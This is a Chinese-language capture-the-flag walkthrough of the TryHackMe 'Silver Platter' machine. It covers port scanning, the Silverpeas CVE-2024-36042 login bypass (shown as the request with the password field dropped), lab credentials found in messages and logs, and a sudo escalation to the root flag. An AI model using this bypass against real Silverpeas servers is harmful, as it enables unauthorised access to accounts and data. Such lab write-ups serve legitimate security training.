THM-Silver Platter

本文最后更新于 2025年1月31日 凌晨

信息收集

nmap

nmap 扫一下

1
nmap -sS -sV -Pn 10.10.159.147

开放了 22,80,8080 端口,重点看看 808080 端口

80

点击不同的页面时会在 “contact” 页面中看到一些有用的信息

有一个叫 scr1ptkiddy 的用户名,并且有一个叫 Silverpeas 的东西。

8080

访问进去发现

1
404 - Not Found

扫描了一下目录

1
dirsearch -u http://10.10.159.147:8080/

没有有用的信息,尝试一番后在 8080 端口发现有一个 silverpeas 页面,是一个登录页面

CVE 利用

最开始尝试了爆破,后来发现不现实,于是去搜了看有没有什么漏洞,在 GitHub 上发现了关于 Silverpeas 的 CVE:CVE-2024-36042,一个身份验证绕过漏洞,https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d。

1
2
Login=scr1ptkiddy&Password=111&DomainId=0
-> Login=scr1ptkiddy&DomainId=0

登录成功!

获取 shell

进去之后找了一圈也没发现啥一样的东西,不过可以看到有 3 个用户

挨个用身份验证绕过漏洞去尝试其余两个用户,最后成功登上了 Manager 账户

发现了 ssh 登陆凭证

1
2
3
Username: tim

Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

通过 ssh 成功登录获取到 user flag

简单提权

查看 /etc/passwd 目录,发现还有一个 tyler 用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
tim@silver-platter:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
tyler:x:1000:1000:root:/home/tyler:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
tim:x:1001:1001::/home/tim:/bin/bash
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
1
tyler:x:1000:1000:root:/home/tyler:/bin/bash

没办法提权,来看看日志,终于在我一条一条看看了很久之后找到了有用的信息

1
Dec 13 15:40:33 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name postgresql -d -e POSTGRES_PASSWORD=_Zd_zx7N823/ -v postgresql-data:/var/lib/postgresql/data postgres:12.3

看到了password:_Zd_zx7N823/

直接用 su 登录

1
2
3
4
tim@silver-platter:/var/log$ su tyler
Password:
tyler@silver-platter:/var/log$ id
uid=1000(tyler) gid=1000(tyler) groups=1000(tyler),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)
1
2
3
4
5
6
7
8
9
10
11
12
13
tyler@silver-platter:~$ sudo -l
[sudo] password for tyler:
Matching Defaults entries for tyler on silver-platter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User tyler may run the following commands on silver-platter:
    (ALL : ALL) ALL
tyler@silver-platter:~$ cd /home
tyler@silver-platter:/home$ ls
tim  tyler
tyler@silver-platter:/home$ cd tyler
tyler@silver-platter:~$ cd /root
bash: cd: /root: Permission denied

输出了 Permission denied,权限还是不够,发现 User tyler may run the following commands on silver-platter: (ALL : ALL) ALL,所以直接试试 sudo su

1
2
3
4
5
6
tyler@silver-platter:~$ sudo su
root@silver-platter:/home/tyler# cd /root
root@silver-platter:~# ls
root.txt  snap  start_docker_containers.sh
root@silver-platter:~# cat root.txt
THM{098f6bcd4621d373cade4e832627b4f6}

拿到 root flag

渗透 > 靶机 > THM
#THM 渗透
THM-Silver Platter
http://example.com/2025/01/31/Platter/
作者
butt3rf1y
发布于
2025年1月31日
许可协议